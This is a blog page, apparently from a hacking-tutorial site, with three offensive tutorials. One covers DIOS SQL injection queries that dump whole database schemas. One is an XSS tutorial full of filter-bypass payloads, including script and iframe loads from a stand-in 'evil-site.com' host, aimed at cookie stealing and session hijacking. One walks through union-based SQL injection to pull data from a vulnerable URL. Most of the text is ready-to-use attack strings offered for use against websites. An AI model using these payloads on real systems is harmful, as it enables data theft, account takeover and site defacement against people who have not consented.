0 04:22
DIOS (Dump in One Shot) Explained By Security Idiots & Zenodermus Javanicus DIOS (Dump in One Shot) Explained By Security Idiots & Zenodermus Javanicus

DIOS (Dump in One Shot) Explained Starting on the name of My god "Allah" the most beneficent the most merciful I dont know if ...

Read more »

0 06:02
Cross Site Scripting (XSS) Tutorial By Unknown Cross Site Scripting (XSS) Tutorial By Unknown

Cross Site Scripting (XSS) Tutorial  Simply put, cross site scripting involves the injection of malicious code into a website. It is the mo...

Read more »

0 05:56
Basic Union Based Injection By Security Idiots & Zenodermus Javanicus Basic Union Based Injection By Security Idiots & Zenodermus Javanicus

Basic Union Based Injection Welcome to the third part of SQL Injection. In this tutorial we will learn how to inject Union based injecti...

Read more »

0 20:05
Basic of SQL for SQL Injection part 3 Basic of SQL for SQL Injection part 3

Basic of SQL for SQL Injection part 3 Welcome to the third part of basics of SQL for SQL injection. As in the last part we took this url...

Read more »

Thursday, 5 March 2015

DIOS (Dump in One Shot) Explained By Security Idiots & Zenodermus Javanicus

DIOS (Dump in One Shot) Explained

Starting on the name of My god "Allah" the most beneficent the most merciful

I dont know if there is an explanation for DIOS already or is it explained in a more better way than the way i am going to expain but i know many of the injectors are searching for it, and even i am getting many requests to write a explanation on DIOS. So here lets start understanding DIOS and how it actually works. We will first make it easy and small then move step by step to complex ones. To understand DIOS you have to read the tutorial atleast twice with full concentration. If you think you will see it step by step and you will understand it easily then you are wrong and at the wrong place. So if you really want to understand then read it carefully.

Here is a Basic Query which gives us all the databases
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The above given query will give us all the databases in one shot. So let us try and understand how it actually works, for that we have to first understand the red colored part of the query. But before that we have to understand the use of in clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The Above statement specify to extract all the records from table where the name value is either 'inj3ct0r' or 'Zenodermus' or 'Security' or 'Idiots' which can also be written in another way by using OR as given below. 

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

Output for both the statements will be same. So now lets move back to DIOS there we can see the innermost statemet which is
(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

Here whats happening is we are select a variable @a from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause. So what will actually happen is that all the schema names will come in 'IN' caluse and will get selected as they all exist in the table information_schema.schemata. As we can see above in the red part @a is concatenated with itself within a loop, each time "@a,schema_name,'<br>'" will be added to @a. Now lets see the rest part.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in ((@a:=concat(@a,schema_name,'<br>'))))a)

Now i guess you can understand we are selecting that concatenated variable @a in the first statement. Now lets move to our next query which gives us all the table names in one shot. One more thing the reason we use this query is because group_concat do not allow characters more than 1024, so in that case we can not extract much data from it. there are some other bypass for 1024 character limitation which is discussed over here at Death Row Injection
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query will give us all the table names in the same manner we got the database names, but this time we need to add a condition to remove all the tables which belongs to information_schema, below is the query for that. 
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the Query is giving us all the table names discluding the tables from information_schema. But again a problem is there that we can not see which table belongs to which database so we can also include table_schema each time while concatination.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we got all the Database Names and the table names, but we have a better option to get all the database names, table names and the Column names together by using information_schema.columns table. 
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now lets take a common challenge which gets posted to extract all the table names which are starting with 'shit_', so in that case we can use add up another condition as the below query shows. 
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in next part of DIOS explanataion.

 Author : Zenodermus Javanicus
Posted by at No comments:

Wednesday, 4 March 2015

Cross Site Scripting (XSS) Tutorial By Unknown

Cross Site Scripting (XSS) Tutorial 


Simply put, cross site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non persistent" XSS.
None Persistent XSS

Non persistent as the title suggests means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic coded search engine for a site. Say for example, the site search script is in this format:

Site.com/search.php?search=text here



Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

Simply echoing your search string straight onto the page without performing any validation checks. What if we were to alter the search string to display html of JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font>


Site.com/search.php?search=<script>alert("XSS");</script>


If no sanitation checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used to display anything you want. 

However, since the attacker can only display code on their own pages, this isn't much of a threat to other users. Although if the string was turned into Hex the search string may be slightly more hidden and with a little deception could be used to trick users into thinking the link is legitimate. 

Next there's persistent XSS


Persistent XSS



Again as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will be able to see permanently. In order for these to work, the code has to be made to store itself on the sites server somehow, which can be hard to find.

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page all.php. The register process wasn't sanitized at all, so all a user had to do was simply register with a username containing HTML or JavaScript code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would effect all.php as well as the forums and anywhere where the username was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found off sites designed to help novices.

With both of these attacks, it is also possible to run malicious code from another site again making the possibilities of attack endless. Javascript has a lot of features the are not well know, such as changing the images on sites from images[number].src and anyone who uses myspace will know the CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site:

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


Getting Past Basic Protection 



So what if a site owner knows about XSS, but has provided some but very little protection against it? Well, this is where CharCode comes in. Char code is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but still get displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if it is vulnerable: 

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>


This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one of two of them work, so you need to try to eliminate some of them to text which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can see, each provides a slight variation to try to beat character blocking.

XSS could also be hidden in a none existent image. This code below would run malicious JavaScript disguised as an image:

<img src="javascript:alert('XSS');">


What if quotes are blocked? No problem, just inject the site like so: 

<img src=javascript:alert(&quot;XSS&quot;)>


The &quot; will be interpreted in html as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable.

<img src=javascript:alert(String.fromCharCode(88,83,83))>


The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic code that was invented to allow all characters to be available to everyone e.g. for different languages such as chinese character symbols. And ASCII has a similar purpose. You can go to http://www.asciitable.comto view the HTML code needed for ASCII code. This below shows the whole code in ASCII form:

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


As you can tell, this will beat many filters as the code is basically unrecognisable. However, translating the code can display what it was designed to do. Next for Unicode, again this makes the text unrecognisable but works the same:

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>


If the site has a limited amount of characters allowed, this probably won't be useful. As mentioned previously, hex can also be used for XSS. The example below shows this:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>


Again unrecognisable which makes it a great XSS to use.

The list of possible XSS attacks is endless and is far more than is covered here. With so many ways to bypass security checks site owners have to work harder to try to protect their sites. As well as web forms being used on most sites these days allowing users to enter code which will be stored somewhere and inevitably viewed by someone else XSS can be used for almost anything. With practise XSS can be used to run a hidden cookie stealer which a user will view and allow you to steal their login info or if sessions are used perform "session hijacking" where you steal their session data and again log in as them. To the simple defacement of a website through HTML or Javascript. XSS is definitely an attack method which should be studied well as it provides such a common method of attack.

As mentioned above, the list of possible XSS attacks is endless, there isn't enough room to mention them here, but I will finish with some more XSS examples that may effect a vulnerable site.

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT> - again beat checks using Javascript



<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

<BGSOUND SRC="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 

- base64 encoding, another form of encryption, this one is less likely to work. 

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method, here you rename your .js to .jpg, but since you have the script tags it will still be read as a js file. 



The list goes on and on, the best way is to just try them yourself. A lot of the time incorrectly written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or "<" to the start or end of the code for example or view the source of the page for code tags you need to close. Adding a "'>" to the end then starting your own malicious code. Well, that's the end of this tutorial. For more XSS attack example just use google as more of these are being though up every day. Soon you should even be able to invent your own.
Posted by at No comments:

Basic Union Based Injection By Security Idiots & Zenodermus Javanicus

Basic Union Based Injection

Welcome to the third part of SQL Injection. In this tutorial we will learn how to inject Union based injection.

In our last tutorial we learnt how to find out the number of columns used under the query so that we can use Union select statement. So we will continue that same url and same injection we were injecting. In the last tutorial we found that the vulnerable URL is having 5 numbers of columns and the below query was working.

http://fakesite.com/report.php?id=23 order by 5--+


Now we will use Union select statement over here.

http://fakesite.com/report.php?id=23 union select 1,2,3,4,5--+


what will it do is concatenate one more row to the output which will look like this

column1column2column3column4column5
anydataanydataanydataanydataanydata
12345


Here a small understanding of the web application is required, If you see any of these numbers printed in the webpage or the title or anywhere else then you can know the the developer is printing multiple rows. But in case you can not see any of these numbers printed then you can simply invalidate the first query so that it wont give any output and eventually your output will become the one and only output to be printed.

http://fakesite.com/report.php?id=23 and 0 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23 and false union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=-23 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23000000 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=null union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23 && 0 union select 1,2,3,4,5--+


Above i have specified some ways to make a query invalid but remember that & should be url encoded before usage. Now when we will use any of the above query, one row will come in output.

column1column2column3column4column5
12345


Any of the number must be printed in the webpage again as basic thing to understand is that programmer may be only printing some particular columns from the output, lets say the third one. So we if we can see 3 in the page then its good otherwise we can try the query below with some other values.

http://fakesite.com/report.php?id=-23 union select 'hello1','hello2','hello3','hello4','hello5'--+


Now just try to find it inside the source code. If you find hello1 that means the first colums is getting printed and if you found hello2 then the second column is getting printed and so on. Still some times if the programmer is using mysql_real_escape_string it may create an error or else no output. We can simply avoid the usage of single quotes using hex values. Below is the encoded query for the above same query.

http://fakesite.com/report.php?id=-23 union select 0x68656c6c6f31,0x68656c6c6f32,0x68656c6c6f33,0x68656c6c6f34,0x68656c6c6f35--+


One small thing to remember is that always add 0x before any hexadecimal value. Hopefully the above query should work and you will find the column which is getting printed on the webpage or inside the source code. We will stich up with 3rd column for this example. As we know that any thing on place of third column is getting printed. Then now we can try some Default functions and variables, to get some information related to our target. Below are some of the Variables/Functions that can be used to get information about your target machine.

Variable/FunctionOutput
@@hostname:Current Hostname
@@tmpdir:Tept Directory
@@datadir:Data Directory
@@version:Version of DB
@@basedir:Base Directory
user():Current User
database():Current Database
version():Version
schema():current Database
UUID():System UUID key
current_user():Current User
current_user:Current User
system_user():Current Sustem user
session_user():Session user
@@GLOBAL.have_symlink:Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl:Check if it have ssl or not


As we know that third is the column which is getting printed so now we will use the above functions on place of that columns only.

To get the Current Database Name
http://fakesite.com/report.php?id=-23 union select 1,2,database(),4,5--+

To get the Current Version
http://fakesite.com/report.php?id=-23 union select 1,2,version(),4,5--+

To get the Current User
http://fakesite.com/report.php?id=-23 union select 1,2,user(),4,5--+

To get the Temporary Directory Path
http://fakesite.com/report.php?id=-23 union select 1,2,@@tmpdir,4,5--+


Now we will move to our next part, which is Data Extraction.

Data Extraction using SQLi


There are many ways to extract data using SQLi so first one is union based. First i will show you the Queries and then show you how we can inject them.

Query : Select table_schema from information_schema.schemata

Injection : http://fakesite.com/report.php?id=-23 union select 1,2,version(),4,5--+


Will give us names of all the Databases avaiable. But as we found earlier that sometimes programmer may not be printing all the rows. He may be printing the first row from output. So in that case we can use limit keyword to enumerate the rows one by one.

First row
Select table_schema from information_schema.schemata limit 0,1--+

Second row
Select table_schema from information_schema.schemata limit 1,1--+

Third row
Select table_schema from information_schema.schemata limit 2,1--+

Forth row
Select table_schema from information_schema.schemata limit 3,1--+

and so on...


In the above manner we can get each row one by one. Now lets see how can we extract all the table names from a database.

Query : Select table_name from information_schema.talbes where table_schema='databasename'

Query for Current DB: Select table_name from information_schema.tables where table_schema=database()

Injection : http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()--+


Above injection will give you all the rows at once, but if you want one by one then you can use limit.

First row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 0,1--+

Second row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 1,1--+

Third row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 2,1--+

Forth row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 3,1--+

and so on...


After getting the Table Names we can move on and start collecting the names of Columns under any table. we can specify the table name as we have all the tablenames.

Query : Select column_name from information_schema.columns where table_schema=database() and table_name='tablenamehere'

Injection : http://fakesite.com/report.php?id=-23 union Select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablenamehere'--+


If the above query do not give any output or an error. You can try to hex the tablename. And now we can try to get all the table names one by one if only one row is getting printed.

First row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 0,1--+

Second row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 1,1--+

Third row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 2,1--+

Forth row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 3,1--+

and so on...


Now we know the database name, the table names and the column names so the last stage starts of extracting data from the columns. Now we have to specify from which column we want the data and from which table. Query and injection is simple at this stage

Query : Select column1, column2 from tablename

First row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 0,1--+

Second row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 1,1--+

Third row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 2,1--+

Forth row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 3,1--+


Thats all for Basic Union Based Injection.

 Author : Zenodermus Javanicus & Security Idiots
Posted by at No comments:

Tuesday, 3 March 2015

Basic of SQL for SQL Injection part 3

Basic of SQL for SQL Injection part 3

Welcome to the third part of basics of SQL for SQL injection. As in the last part we took this url "http://fakesite.com/report.php?id=23" as an example and then assumed some basic queries by looking at the URL and then we tried different injections and learnt how to figure out which type of query we are facing. In this tutorial we will learn how we can understand which comment type we should use and why and how to find the number of columns

As discussed earlier following are the different types of comments used in SQLi.

CommentName
--:MySQL Linux Style
--+:MySQL Windows Style
#:Hash (URL encode while use)
--+-:SQL Comment
;:Null Byte
`:Backtick


well actually it only depends on the environment and reaction of application when we try some commenting operators. If you see php is used then usually "--" will surely work other wise you can check "--+" or "# (url encoded)", else the best option is to try with different types of comments and analyse the input. So what we will do to check is try to close our input with all possibilities like single quote double quote or brackets etc, and comment rest query and if it works then we can be sure that this comment is working. We will again take the same url for example "http://fakesite.com/report.php?id=23" so lets see how can we check for which comment to use.

InjectionIf it gives same Output as 23 was giving then
http://fakesite.com/report.php?id=23--:Its intiger type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23'--:Its Single quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23"--:Its Double quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23)--:Its intiger type with bracket injection and '--' can be used as comment
http://fakesite.com/report.php?id=23')--:Its Single quote with bracket type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23")--:Its Double quote with bracket type injection and '--' can be used as comment


so as i showed above test for '--' type comment in the same manner you can check for all commenting types and the one which gives same output as giving with "http://fakesite.com/report.php?id=23" then that can help you understand the type of internal query alongwith the comment that you can use.

Now as we have understood understanding and knowing the internal query and then finding the type of command we can use. First of all we will understand the basics of injecting.

Any time anywhere or any application where ever and whenever you are injecting there are following three basic rules of injecting

[1]. Balance.
[2]. Inject.
[3]. Commenting.

Understanding the first phase "Balance":

In this phase we balance the internal query, for example lets say after reading the Part 1 and Part 2 we understand that how can we assume and figure out the internal query used by the application where your input is injected. Lets say we figured out that out internal query is "Select * from tablename where id=('23')" so in this case our balance input should be 23').

The phase of Injection:

In this phase we inject as per our requirement, and the type of injection we are doing.

The phase of Commenting:

Then the last part of commenting, which we already know. Now check the below image which will show you all the three parts on injection.


As per the Above Injection we can assume the internal query to be:
Select * from tablename where id='<input>'
So when we pass the url "http://fakesite.com/report.php?id=23' order by 1--+" then it will be injected on place of <input> in above query and become:
Select * from tablename where id='23' order by 1--+'


So now lets start with our next phase, in this phase we will learn why and how to find the number of columns. First lets start by understanding why we require to find the number of columns. First again lets start from the basics our example database: 


Select f_name,l_name from students where id=1


Output will be:

f_namel_name
Emilywatson


Now lets see how we can manipulate the output using Union statement. Union is used to add the output of multiple queries together. For Example Below is a simple union query.

Select f_name,l_name from students where id=1 union select f_name,l_name from students where id=2


Output will be:

f_namel_name
Emilywatson
DenielRobertson


So what the union query did over here is it concatenated output of two different Select queries. But one thing to remember while concatenating, that Union will only concatenate if both queries are outputting same numbers of columns. Lets try some more.
Select f_name,l_name from students where id=1 union select 1,2


Output will be:

f_namel_name
Emilywatson
12


Select f_name,l_name from students where id=1 union select 'hello','bye'


Output will be:

f_namel_name
Emilywatson
hellobye


Select f_name,l_name from students where id=1 union select 5545,2323


Output will be:

f_namel_name
Emilywatson
55452323


Select f_name,l_name from students where id=1 union select database(),user()


Output will be:

f_namel_name
Emilywatson
fakedb1fakeuser@localhost


Select * from students where id=1 union select f_name,l_name from students where id=2


for the above one there wont be any output but only an error that "The used SELECT statements have a different number of columns", because "select * from students" is selecting all the columns from the table students which are four, that is why when we tried to union 2 columns with it, we got an error. Union select is used to concatenate our injected output with the real output. Here we face a problem that we must know the number of columns select query is using so that we can make the right union select statement. Here enters the "order by" keyword. Order by is used to sort the output of a query lets see some examples.

QueryOutput
select * from students order by 1:It will output all the rows and sort then by the first column which is id
select * from students order by 2:It will output all the rows and sort then by the second column which is f_name
select * from students order by 3:It will output all the rows and sort then by the third column which is l_name
select * from students order by 4:It will output all the rows and sort then by the forth column which is roll_no
select * from students order by 5:It will create an error "Unknown column '5' in 'order clause'"
select f_name,l_name from students order by 1:It will output all the rows and sort then by the first column which is f_name
select f_name,l_name from students order by 2:It will output all the rows and sort then by the second column which is l_name
select f_name,l_name from students order by 3:It will create an error "Unknown column '3' in 'order clause'"


So we have analysed above that if we try to sort our output with any number which is more than our column count then it will create error. So we can easily understand that we can use order by to know how many columns we have inside the query.

Now again lets take an example URL "http://fakesite.com/report.php?id=23" and start injecting it from starting:

[#] Testing

QueryOutput
http://fakesite.com/report.php?id=23:Simple Output from Web-Application
http://fakesite.com/report.php?id=23':Error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"
http://fakesite.com/report.php?id=23":Error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1"
http://fakesite.com/report.php?id=23 and true:As we remember in Part 2 while testing internal query if error comes with both single and double qoute then the internal query could be intiger based, so now testing for that. It Gives output
http://fakesite.com/report.php?id=23 and false:No Output


So as we learnt from Part 2 we tested this URL and understood that its a Intiger Based Query. We can make an assumption like below.
Select * from anytablename where id=<Input>


Now let us try and see which comment type we can use. As we already know that input is intiger type and is not enclosed by any single or double qoute so we will be testing for intiger type injection only and wont have to close any single or double qoute this time.

QueryOutput
http://fakesite.com/report.php?id=23`:Backtick type commenting (Error)
http://fakesite.com/report.php?id=23--:Error or no Output
http://fakesite.com/report.php?id=23--+:Same Output like 23 was giving
http://fakesite.com/report.php?id=23 or true--+:No error but some different output


As we learnt while testing for comment type we can understand with the above output that --+ can be used over here as comment. So as we can see whatever we inject in URL gets injected in the query. Our next task starts here. As now we need to use Union Select statement so that we can manipulate the output and print whatever we want to extract about and from the database. But to use Union select we must know the number of columns used under the query. For that we will use 'Order By' as we know if we give order by a number more than the number under the query, then it will throw an error.

URL InjectionInternal QueryOutput
http://fakesite.com/report.php?id=23 order by 10--+Select * from tablename where id=23 order by 10Error (then reduce)
http://fakesite.com/report.php?id=23 order by 1--+Select * from tablename where id=23 order by 1Working (then increse)
http://fakesite.com/report.php?id=23 order by 5--+Select * from tablename where id=23 order by 5Working (then increase)
http://fakesite.com/report.php?id=23 order by 8--+Select * from tablename where id=23 order by 8Error (then reduce)
http://fakesite.com/report.php?id=23 order by 6--+Select * from tablename where id=23 order by 6Error (then reduce)


We already know that 5 worked so we dont need to reduce and test again. We can simply understand that 5 is the last number that worked. Now we can use Union select query, which will be the next phase of our injection. Thats all for this part. We will continue our Journey to SQLi in next part.

 Author : Zenodermus Javanicus & http://securityidiots.com/
Posted by at No comments:
Subscribe to: Comments (Atom)